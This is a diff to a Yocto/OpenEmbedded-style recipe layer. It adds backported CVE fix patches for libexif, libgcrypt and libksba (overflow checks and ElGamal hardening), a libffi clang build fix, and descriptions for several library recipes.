index 0000000000..2a48844cb2
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
@@ -0,0 +1,66 @@
+From ca71eda33fe8421f98fbe20eb4392473357c1c43 Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:22:47 +0800
+Subject: [PATCH] fixed another unsigned integer overflow
+
+first fixed by google in android fork,
+https://android.googlesource.com/platform/external/libexif/+/1e187b62682ffab5003c702657d6d725b4278f16%5E%21/#F0
+
+(use a more generic overflow check method, also check second overflow instance.)
+
+https://security-tracker.debian.org/tracker/CVE-2020-0198
+
+Upstream-Status: Backport[https://github.com/libexif/libexif/commit/ce03ad7ef4e8aeefce79192bf5b6f69fae396f0c]
+CVE: CVE-2020-0198
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-data.c | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/libexif/exif-data.c b/libexif/exif-data.c
+index 8b280d3..34d58fc 100644
+--- a/libexif/exif-data.c
++++ b/libexif/exif-data.c
+@@ -47,6 +47,8 @@
+ #undef JPEG_MARKER_APP1
+ #define JPEG_MARKER_APP1 0xe1
+ 
++#define CHECKOVERFLOW(offset,datasize,structsize) (( offset >= datasize) || (structsize > datasize) || (offset > datasize - structsize ))
++
+ static const unsigned char ExifHeader[] = {0x45, 0x78, 0x69, 0x66, 0x00, 0x00};
+ 
+ struct _ExifDataPrivate
+@@ -327,7 +329,7 @@ exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
+ 		exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail offset (%u).", o);
+ 		return;
+ 	}
+-	if (s > ds - o) {
++	if (CHECKOVERFLOW(o,ds,s)) {
+ 		exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail size (%u), max would be %u.", s, ds-o);
+ 		return;
+ 	}
+@@ -420,9 +422,9 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ 	}
+ 
+ 	/* Read the number of entries */
+-	if ((offset + 2 < offset) || (offset + 2 < 2) || (offset + 2 > ds)) {
++	if (CHECKOVERFLOW(offset, ds, 2)) {
+ 		exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
+-			  "Tag data past end of buffer (%u > %u)", offset+2, ds);
++			  "Tag data past end of buffer (%u+2 > %u)", offset, ds);
+ 		return;
+ 	}
+ 	n = exif_get_short (d + offset, data->priv->order);
+@@ -431,7 +433,7 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ 	offset += 2;
+ 
+ 	/* Check if we have enough data. */
+-	if (offset + 12 * n > ds) {
++	if (CHECKOVERFLOW(offset, ds, 12*n)) {
+ 		n = (ds - offset) / 12;
+ 		exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
+ 				  "Short data; only loading %hu entries...", n);
+-- 
+2.17.1
+
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0452.patch b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
new file mode 100644
index 0000000000..a117b8b369
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
@@ -0,0 +1,39 @@
+From 302acd49eba0a125b0f20692df6abc6f7f7ca53e Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:18:51 +0800
+Subject: [PATCH] fixed a incorrect overflow check that could be optimized
+ away.
+
+inspired by:
+https://android.googlesource.com/platform/external/libexif/+/8e7345f3bc0bad06ac369d6cbc1124c8ceaf7d4b
+
+https://source.android.com/security/bulletin/2020-11-01
+
+CVE-2020-0452
+
+Upsteam-Status: Backport[https://github.com/libexif/libexif/commit/9266d14b5ca4e29b970fa03272318e5f99386e06]
+CVE: CVE-2020-0452
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-entry.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libexif/exif-entry.c b/libexif/exif-entry.c
+index 5de215f..3a6ce84 100644
+--- a/libexif/exif-entry.c
++++ b/libexif/exif-entry.c
+@@ -1371,8 +1371,8 @@ exif_entry_get_value (ExifEntry *e, char *val, unsigned int maxlen)
+ 	{
+ 		unsigned char *utf16;
+ 
+-		/* Sanity check the size to prevent overflow */
+-		if (e->size+sizeof(uint16_t)+1 < e->size) break;
++		/* Sanity check the size to prevent overflow. Note EXIF files are 64kb at most. */
++		if (e->size >= 65536 - sizeof(uint16_t)*2) break;
+ 
+ 		/* The tag may not be U+0000-terminated , so make a local
+ 		   U+0000-terminated copy before converting it */
+-- 
+2.17.1
+
diff --git a/meta/recipes-support/libexif/libexif_0.6.22.bb b/meta/recipes-support/libexif/libexif_0.6.22.bb
index a520d5c9f9..86d4464253 100644
--- a/meta/recipes-support/libexif/libexif_0.6.22.bb
+++ b/meta/recipes-support/libexif/libexif_0.6.22.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Library for reading extended image information (EXIF) from JPEG files"
+DESCRIPTION = "libexif is a library for parsing, editing, and saving EXIF data. It is \
+intended to replace lots of redundant implementations in command-line \
+utilities and programs with GUIs."
 HOMEPAGE = "https://libexif.github.io/"
 SECTION = "libs"
 LICENSE = "LGPLv2.1"
@@ -8,6 +11,8 @@ def version_underscore(v):
     return "_".join(v.split("."))
 
 SRC_URI = "https://github.com/libexif/libexif/releases/download/libexif-${@version_underscore("${PV}")}-release/libexif-${PV}.tar.xz \
+           file://CVE-2020-0198.patch \
+           file://CVE-2020-0452.patch \
            "
 
 SRC_URI[sha256sum] = "5048f1c8fc509cc636c2f97f4b40c293338b6041a5652082d5ee2cf54b530c56"
diff --git a/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
new file mode 100644
index 0000000000..782dce70d8
--- /dev/null
+++ b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
@@ -0,0 +1,104 @@
+From 501a6b55853af549fae72723e74271f2a4ec7cf6 Mon Sep 17 00:00:00 2001
+From: Brett Warren <brett.warren@arm.com>
+Date: Fri, 27 Nov 2020 15:28:42 +0000
+Subject: [PATCH] arm/sysv: reverted clang VFP mitigation
+
+Since commit e3d2812ce43940aacae5bab2d0e965278cb1e7ea,
+seperate instructions were used when compiling under clang, 
+as clang didn't allow the directives at the time. This mitigation
+now causes compilation to fail under clang 10, as described by 
+https://github.com/libffi/libffi/issues/607. Now that
+clang supports the LDC and SDC instructions, this mitigation
+has been reverted.
+
+Upstream-Status: Pending
+Signed-off-by: Brett Warren <brett.warren@arm.com>
+---
+ src/arm/sysv.S | 33 ---------------------------------
+ 1 file changed, 33 deletions(-)
+
+diff --git a/src/arm/sysv.S b/src/arm/sysv.S
+index 63180a4..e3ce526 100644
+--- a/src/arm/sysv.S
++++ b/src/arm/sysv.S
+@@ -128,13 +128,8 @@ ARM_FUNC_START(ffi_call_VFP)
+ 	cfi_startproc
+ 
+ 	cmp	r3, #3			@ load only d0 if possible
+-#ifdef __clang__
+-	vldrle d0, [sp]
+-	vldmgt sp, {d0-d7}
+-#else
+ 	ldcle	p11, cr0, [r0]		@ vldrle d0, [sp]
+ 	ldcgt	p11, cr0, [r0], {16}	@ vldmgt sp, {d0-d7}
+-#endif
+ 	add	r0, r0, #64		@ discard the vfp register args
+ 	/* FALLTHRU */
+ ARM_FUNC_END(ffi_call_VFP)
+@@ -172,25 +167,13 @@ ARM_FUNC_START(ffi_call_SYSV)
+ 	nop
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+-	vstr s0, [r2]
+-#else
+ 	stc	p10, cr0, [r2]		@ vstr s0, [r2]
+-#endif
+ 	pop	{fp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+-	vstr d0, [r2]
+-#else
+ 	stc	p11, cr0, [r2]		@ vstr d0, [r2]
+-#endif
+ 	pop	{fp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+-	vstm r2, {d0-d3}
+-#else
+ 	stc	p11, cr0, [r2], {8}	@ vstm r2, {d0-d3}
+-#endif
+ 	pop	{fp,pc}
+ E(ARM_TYPE_INT64)
+ 	str	r1, [r2, #4]
+@@ -287,11 +270,7 @@ ARM_FUNC_START(ffi_closure_VFP)
+ 	add	ip, sp, #16
+ 	sub	sp, sp, #64+32			@ allocate frame
+ 	cfi_adjust_cfa_offset(64+32)
+-#ifdef __clang__
+-	vstm sp, {d0-d7}
+-#else
+ 	stc	p11, cr0, [sp], {16}		@ vstm sp, {d0-d7}
+-#endif
+ 	stmdb	sp!, {ip,lr}
+ 
+ 	/* See above.  */
+@@ -320,25 +299,13 @@ ARM_FUNC_START_LOCAL(ffi_closure_ret)
+ 	cfi_rel_offset(lr, 4)
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+-	vldr s0, [r2]
+-#else
+ 	ldc	p10, cr0, [r2]			@ vldr s0, [r2]
+-#endif
+ 	ldm	sp, {sp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+-	vldr d0, [r2]
+-#else
+ 	ldc	p11, cr0, [r2]			@ vldr d0, [r2]
+-#endif
+ 	ldm	sp, {sp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+-	vldm r2, {d0-d3}
+-#else
+ 	ldc	p11, cr0, [r2], {8}		@ vldm r2, {d0-d3}
+-#endif
+ 	ldm	sp, {sp,pc}
+ E(ARM_TYPE_INT64)
+ 	ldr	r1, [r2, #4]
+-- 
+2.17.1
+
diff --git a/meta/recipes-support/libffi/libffi_3.3.bb b/meta/recipes-support/libffi/libffi_3.3.bb
index 9dfdb9e39b..10ef003242 100644
--- a/meta/recipes-support/libffi/libffi_3.3.bb
+++ b/meta/recipes-support/libffi/libffi_3.3.bb
@@ -13,6 +13,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=492385fe22195952f5b9b197868ba268"
 SRC_URI = "https://github.com/libffi/libffi/releases/download/v${PV}/${BPN}-${PV}.tar.gz \
            file://not-win32.patch \
            file://0001-Fixed-missed-ifndef-for-__mips_soft_float.patch \
+           file://0001-arm-sysv-reverted-clang-VFP-mitigation.patch \
            file://0001-powerpc-fix-build-failure-on-power7-and-older-532.patch \
            file://0001-Address-platforms-with-no-__int128.patch \
            file://0001-Address-platforms-with-no-__int128-part2.patch \
diff --git a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
index 85102a1a3d..8971486715 100644
--- a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Library for file management"
+DESCRIPTION = "Contains a library and other files required by menu-cache-gen libexec of menu-cache-1.1.0. "
 HOMEPAGE = "http://pcmanfm.sourceforge.net/"
 
 LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/libfm/libfm_1.3.1.bb b/meta/recipes-support/libfm/libfm_1.3.1.bb
index 63ae7874b9..b6f9df0c55 100644
--- a/meta/recipes-support/libfm/libfm_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm_1.3.1.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Library for file management"
+DESCRIPTION = "LibFM provides file management functions built on top of Glib/GIO \
+giving a convenient higher-level API."
 HOMEPAGE = "http://pcmanfm.sourceforge.net/"
 
 LICENSE = "GPLv2+ & LGPLv2+"
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
new file mode 100644
index 0000000000..bf26486d8b
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
@@ -0,0 +1,77 @@
+From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Tue, 13 Apr 2021 10:00:00 +0900
+Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding
+ too.
+
+* cipher/elgamal.c (do_encrypt): Also do exponent blinding.
+
+--
+
+Base blinding had been introduced with USE_BLINDING.  This patch add
+exponent blinding as well to mitigate side-channel attack on mpi_powm.
+
+GnuPG-bug-id: 5328
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33560
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ cipher/elgamal.c | 20 +++++++++++++++++---
+ 1 file changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..9835122f 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ static void
+ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+ {
+-  gcry_mpi_t t1, t2, r;
++  gcry_mpi_t t1, t2, r, r1, h;
+   unsigned int nbits = mpi_get_nbits (skey->p);
++  gcry_mpi_t x_blind;
+ 
+   mpi_normalize (a);
+   mpi_normalize (b);
+@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+ 
+   t2 = mpi_snew (nbits);
+   r  = mpi_new (nbits);
++  r1 = mpi_new (nbits);
++  h  = mpi_new (nbits);
++  x_blind = mpi_snew (nbits);
+ 
+   /* We need a random number of about the prime size.  The random
+      number merely needs to be unpredictable; thus we use level 0.  */
+   _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM);
+ 
++  /* Also, exponent blinding: x_blind = x + (p-1)*r1 */
++  _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM);
++  mpi_set_highbit (r1, nbits - 1);
++  mpi_sub_ui (h, skey->p, 1);
++  mpi_mul (x_blind, h, r1);
++  mpi_add (x_blind, skey->x, x_blind);
++
+   /* t1 = r^x mod p */
+-  mpi_powm (t1, r, skey->x, skey->p);
++  mpi_powm (t1, r, x_blind, skey->p);
+   /* t2 = (a * r)^-x mod p */
+   mpi_mulm (t2, a, r, skey->p);
+-  mpi_powm (t2, t2, skey->x, skey->p);
++  mpi_powm (t2, t2, x_blind, skey->p);
+   mpi_invm (t2, t2, skey->p);
+   /* t1 = (t1 * t2) mod p*/
+   mpi_mulm (t1, t1, t2, skey->p);
+ 
++  mpi_free (x_blind);
++  mpi_free (h);
++  mpi_free (r1);
+   mpi_free (r);
+   mpi_free (t2);
+ 
+-- 
+2.11.0
+
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
new file mode 100644
index 0000000000..b3a18bc5aa
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
@@ -0,0 +1,109 @@
+From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Fri, 21 May 2021 11:15:07 +0900
+Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations.
+
+* cipher/elgamal.c (gen_k): Remove support of smaller K.
+(do_encrypt): Never use smaller K.
+(sign): Folllow the change of gen_k.
+
+--
+
+Cherry-pick master commit of:
+	632d80ef30e13de6926d503aa697f92b5dbfbc5e
+
+This change basically reverts encryption changes in two commits:
+
+	74386120dad6b3da62db37f7044267c8ef34689b
+	78531373a342aeb847950f404343a05e36022065
+
+Use of smaller K for ephemeral key in ElGamal encryption is only good,
+when we can guarantee that recipient's key is generated by our
+implementation (or compatible).
+
+For detail, please see:
+
+    Luca De Feo, Bertram Poettering, Alessandro Sorniotti,
+    "On the (in)security of ElGamal in OpenPGP";
+    in the proceedings of  CCS'2021.
+
+CVE-id: CVE-2021-33560
+GnuPG-bug-id: 5328
+Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-40528
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+---
+ cipher/elgamal.c | 24 ++++++------------------
+ 1 file changed, 6 insertions(+), 18 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..ae7a631e 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -66,7 +66,7 @@ static const char *elg_names[] =
+ 
+ 
+ static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie);
+-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k);
++static gcry_mpi_t gen_k (gcry_mpi_t p);
+ static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits,
+                                  gcry_mpi_t **factors);
+ static int  check_secret_key (ELG_secret_key *sk);
+@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie )
+ 
+ /****************
+  * Generate a random secret exponent k from prime p, so that k is
+- * relatively prime to p-1.  With SMALL_K set, k will be selected for
+- * better encryption performance - this must never be used signing!
++ * relatively prime to p-1.
+  */
+ static gcry_mpi_t
+-gen_k( gcry_mpi_t p, int small_k )
++gen_k( gcry_mpi_t p )
+ {
+   gcry_mpi_t k = mpi_alloc_secure( 0 );
+   gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) );
+@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k )
+   unsigned int nbits, nbytes;
+   char *rndbuf = NULL;
+ 
+-  if (small_k)
+-    {
+-      /* Using a k much lesser than p is sufficient for encryption and
+-       * it greatly improves the encryption performance.  We use
+-       * Wiener's table and add a large safety margin. */
+-      nbits = wiener_map( orig_nbits ) * 3 / 2;
+-      if( nbits >= orig_nbits )
+-        BUG();
+-    }
+-  else
+-    nbits = orig_nbits;
+-
++  nbits = orig_nbits;
+ 
+   nbytes = (nbits+7)/8;
+   if( DBG_CIPHER )
+@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+    * error code.
+    */
+ 
+-  k = gen_k( pkey->p, 1 );
++  k = gen_k( pkey->p );
+   mpi_powm (a, pkey->g, k, pkey->p);
+ 
+   /* b = (y^k * input) mod p
+@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey )
+     *
+     */
+     mpi_sub_ui(p_1, p_1, 1);
+-    k = gen_k( skey->p, 0 /* no small K ! */ );
++    k = gen_k( skey->p );
+     mpi_powm( a, skey->g, k, skey->p );
+     mpi_mul(t, skey->x, a );
+     mpi_subm(t, input, t, p_1 );
+-- 
+2.30.2
+
diff --git a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
index 4e0eb0a169..8045bab9ed 100644
--- a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
+++ b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
@@ -1,4 +1,7 @@
 SUMMARY = "General purpose cryptographic library based on the code from GnuPG"
+DESCRIPTION = "A cryptography library developed as a separated module of GnuPG. \
+It can also be used independently of GnuPG, but depends on its error-reporting \
+library Libgpg-error."
 HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/"
 BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
 SECTION = "libs"
@@ -25,10 +28,15 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
            file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \
            file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \
            file://determinism.patch \
+           file://CVE-2021-33560.patch \
+           file://CVE-2021-40528.patch \
 "
 SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743"
 SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3"
 
+# Below whitelisted CVEs are disputed and not affecting crypto libraries for any distro.
+CVE_CHECK_WHITELIST += "CVE-2018-12433 CVE-2018-12438"
+
 BINCONFIG = "${bindir}/libgcrypt-config"
 
 inherit autotools texinfo binconfig-disabled pkgconfig
diff --git a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
index b9a2b01c20..7b7404b516 100644
--- a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
+++ b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Small library that defines common error values for all GnuPG components"
+DESCRIPTION = "Contains common error codes and error handling functions used by GnuPG, Libgcrypt, GPGME and more packages. "
 HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/"
 BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
 
diff --git a/meta/recipes-support/libical/libical_3.0.7.bb b/meta/recipes-support/libical/libical_3.0.7.bb
index a50473e9ec..170f12b7a9 100644
--- a/meta/recipes-support/libical/libical_3.0.7.bb
+++ b/meta/recipes-support/libical/libical_3.0.7.bb
@@ -1,4 +1,8 @@
 SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library"
+DESCRIPTION = "An Open Source implementation of the iCalendar protocols \
+and protocol data units. The iCalendar specification describes how \
+calendar clients can communicate with calendar servers so users can store \
+their calendar data and arrange meetings with other users. "
 HOMEPAGE = "https://github.com/libical/libical"
 BUGTRACKER = "https://github.com/libical/libical/issues"
 LICENSE = "LGPLv2.1 | MPL-2.0"
diff --git a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
index 710ef0172d..841edc6829 100644
--- a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
+++ b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \
                     file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \
                     file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \
                     "
-SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \
+SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \
            file://0001-Makefile-cleanup-install-for-rebuilds.patch \
            file://0001-Make-man-pages-reproducible.patch"
 SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba"
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
new file mode 100644
index 0000000000..ff9f2f9275
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
@@ -0,0 +1,47 @@
+From 4b7d9cd4a018898d7714ce06f3faf2626c14582b Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Wed, 5 Oct 2022 14:19:06 +0200
+Subject: [PATCH] Detect a possible overflow directly in the TLV parser.
+
+* src/ber-help.c (_ksba_ber_read_tl): Check for overflow of a commonly
+used sum.
+--
+
+It is quite common to have checks like
+
+    if (ti.nhdr + ti.length >= DIM(tmpbuf))
+       return gpg_error (GPG_ERR_TOO_LARGE);
+
+This patch detects possible integer overflows immmediately when
+creating the TI object.
+
+Reported-by: ZDI-CAN-18927, ZDI-CAN-18928, ZDI-CAN-18929
+
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=patch;h=4b7d9cd4a018898d7714ce06f3faf2626c14582b]
+CVE: CVE-2022-3515 
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/ber-help.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/ber-help.c b/src/ber-help.c
+index 81c31ed..56efb6a 100644
+--- a/src/ber-help.c
++++ b/src/ber-help.c
+@@ -182,6 +182,12 @@ _ksba_ber_read_tl (ksba_reader_t reader, struct tag_info *ti)
+       ti->length = len;
+     }
+ 
++  if (ti->length > ti->nhdr && (ti->nhdr + ti->length) < ti->length)
++    {
++      ti->err_string = "header+length would overflow";
++      return gpg_error (GPG_ERR_EOVERFLOW);
++    }
++
+   /* Without this kludge some example certs can't be parsed */
+   if (ti->class == CLASS_UNIVERSAL && !ti->tag)
+     ti->length = 0;
+-- 
+2.11.0
+
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
new file mode 100644
index 0000000000..b09d0eb557
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
@@ -0,0 +1,69 @@
+From b17444b3c47e32c77a3ba5335ae30ccbadcba3cf Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Tue, 22 Nov 2022 16:36:46 +0100
+Subject: [PATCH] Fix an integer overflow in the CRL signature parser.
+
+* src/crl.c (parse_signature): N+N2 now checked for overflow.
+
+* src/ocsp.c (parse_response_extensions): Do not accept too large
+values.
+(parse_single_extensions): Ditto.
+--
+
+The second patch is an extra safegourd not related to the reported
+bug.
+
+GnuPG-bug-id: 6284
+Reported-by: Joseph Surin, elttam
+CVE: CVE-2022-47629
+https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=commit;h=f61a5ea4e0f6a80fd4b28ef0174bee77793cf070
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/crl.c  |  2 +-
+ src/ocsp.c | 12 ++++++++++++
+ 2 files changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/crl.c b/src/crl.c
+index 87a3fa3..9d3028e 100644
+--- a/src/crl.c
++++ b/src/crl.c
+@@ -1434,7 +1434,7 @@ parse_signature (ksba_crl_t crl)
+          && !ti.is_constructed) )
+     return gpg_error (GPG_ERR_INV_CRL_OBJ);
+   n2 = ti.nhdr + ti.length;
+-  if (n + n2 >= DIM(tmpbuf))
++  if (n + n2 >= DIM(tmpbuf) || (n + n2) < n)
+     return gpg_error (GPG_ERR_TOO_LARGE);
+   memcpy (tmpbuf+n, ti.buf, ti.nhdr);
+   err = read_buffer (crl->reader, tmpbuf+n+ti.nhdr, ti.length);
+diff --git a/src/ocsp.c b/src/ocsp.c
+index 4b26f8d..c41234e 100644
+--- a/src/ocsp.c
++++ b/src/ocsp.c
+@@ -912,6 +912,12 @@ parse_response_extensions (ksba_ocsp_t ocsp,
+           else
+             ocsp->good_nonce = 1;
+         }
++      if (ti.length > (1<<24))
++        {
++          /* Bail out on much too large objects.  */
++          err = gpg_error (GPG_ERR_BAD_BER);
++          goto leave;
++        }
+       ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+       if (!ex)
+         {
+@@ -979,6 +985,12 @@ parse_single_extensions (struct ocsp_reqitem_s *ri,
+       err = parse_octet_string (&data, &datalen, &ti);
+       if (err)
+         goto leave;
++      if (ti.length > (1<<24))
++        {
++          /* Bail out on much too large objects.  */
++          err = gpg_error (GPG_ERR_BAD_BER);
++          goto leave;
++        }
+       ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+       if (!ex)
+         {
diff --git a/meta/recipes-support/libksba/libksba_1.3.5.bb b/meta/recipes-support/libksba/libksba_1.3.5.bb
index 336d7f8177..5293aa91e1 100644
--- a/meta/recipes-support/libksba/libksba_1.3.5.bb
+++ b/meta/recipes-support/libksba/libksba_1.3.5.bb
@@ -1,4 +1,9 @@
 SUMMARY = "Easy API to create and parse X.509 and CMS related objects"
+DESCRIPTION = "A library to make the tasks of working with X.509 certificates, \
+CMS data and related objects more easy. It provides a highlevel interface to \
+the implemented protocols and presents the data in a consistent way. The \
+library does not rely on another cryptographic library but provides \
+hooks for easy integration with Libgcrypt. "
 HOMEPAGE = "http://www.gnupg.org/related_software/libksba/"
 LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)"
 LICENSE_${PN} = "GPLv2+ | LGPLv3+"
@@ -17,7 +22,10 @@ inherit autotools binconfig-disabled pkgconfig texinfo
 
 UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html"
 SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
-           file://ksba-add-pkgconfig-support.patch"
+           file://ksba-add-pkgconfig-support.patch \
+           file://CVE-2022-47629.patch \
+           file://CVE-2022-3515.patch \
+"
 
 SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2"
 SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340"
diff --git a/meta/recipes-support/libnl/libnl_3.5.0.bb b/meta/recipes-support/libnl/libnl_3.5.0.bb
index 9d0e1441a9..f4b5d40bb2 100644
--- a/meta/recipes-support/libnl/libnl_3.5.0.bb
+++ b/meta/recipes-support/libnl/libnl_3.5.0.bb
@@ -1,4 +1,9 @@
 SUMMARY = "A library for applications dealing with netlink sockets"
+DESCRIPTION = "The libnl suite is a collection of libraries providing \
+APIs to netlink protocol based Linux kernel interfaces. libnl is the core \
+library implementing the fundamentals required to use the netlink protocol \
+such as socket handling, message construction and parsing, and sending \
+and receiving of data."
